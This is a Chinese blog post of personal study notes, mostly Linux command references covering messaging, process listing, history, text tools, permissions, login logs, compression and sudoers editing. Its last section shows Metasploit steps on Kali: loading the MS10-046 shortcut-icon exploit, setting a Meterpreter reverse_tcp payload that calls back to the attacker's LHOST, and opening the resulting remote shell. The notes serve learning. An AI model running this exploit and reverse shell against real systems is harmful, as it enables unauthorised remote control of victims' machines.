zoukankan      html  css  js  c++  java
  • 2014.10.5 再次学习LINUX

    mesg 发送信息给root y    n
    write/talk 写消息给
    wall 给所有用户发送消息
    ps -aux        ps -elF
    pstree
    命令行跳转:CTRL+a行首    CTRL+e行尾    CTRL+u清除光标左侧至开头    CTRL+k清除光标右侧至结尾    CTRL+左右键
    history -c 清除所有命令        history -d 500 10 从第500个历史开始 删除10个命令记录
    tr 'a-z' 'A-Z'    替换命令
    wc -l
    grep --color    -i    -v显示没有被模式匹配到的行
    sed(Stream EDitor) 流编辑器 - 行编辑器
    awk
    给文件添加特殊权限 suid: chmod u+s FILENAME    SGID
    查看用户登录情况及日志: w whoami who last所有登录主机用户时间日志 lastb登录错误日志 lastlog所有用户登录日志总揽 mail查看邮件
    命令gzip bzip2  xz 压缩文件,并且会删除原文件, 解压缩gunzip        zcat bzcat查看压缩文件 但是不解压    这几个命令是无法压缩文件夹的,只能压缩文件
    zip 可以压缩文件夹, 并且得指定压缩后文件名xxx.zip 不删除源文件
    tar -xzvf解压缩并展开归档  -czvf归档并压缩
    visudo 专门用来编辑 /etc/sudoers    1)chmod u+w /etc/sudoers    2) vi /etc/sudoers    user1 ALL=(ALL) ALL    这就使得用户user1,可以使用sudo命令,执行超级权限了。    3) 最后撤销/etc/sudoer文件的权限    chmod u-w /etc/sudoers
    
    kali下metaexploit使用:
    msfconsole进入msf
    armitage图形化界面
    
    exploit模块:
        use exploit/windows/brower/ms10_046_shortcut_icon_dllloader    //使用哪个exploit
        show options    //查看需要配置的参数
        set SRVHOST 192.XXX
        set PAYLOAD windows/meterpreter/reverse_tcp    //配置exploit成功后 使用的payload
        show options
        set LHOST 192.XXX
        sessions -i 1        //如果攻击成功 进入攻击成功后获取的反弹的CMDSHELL
    
    auxiliary模块:
        use auxiliary/scanner/portscan/syn
  • 相关阅读:
    成绩
    多态与异常处理
    大道至简终结版
    继承与接口
    大道至简之编程到工程
    数组元素相加
    数组元素必须具有相同的数据类型?
    大道至简之失败的过程也是过程
    作业
    感想之流于形式的沟通
  • 原文地址:https://www.cnblogs.com/qunshu/p/4007521.html
Copyright © 2011-2022 走看看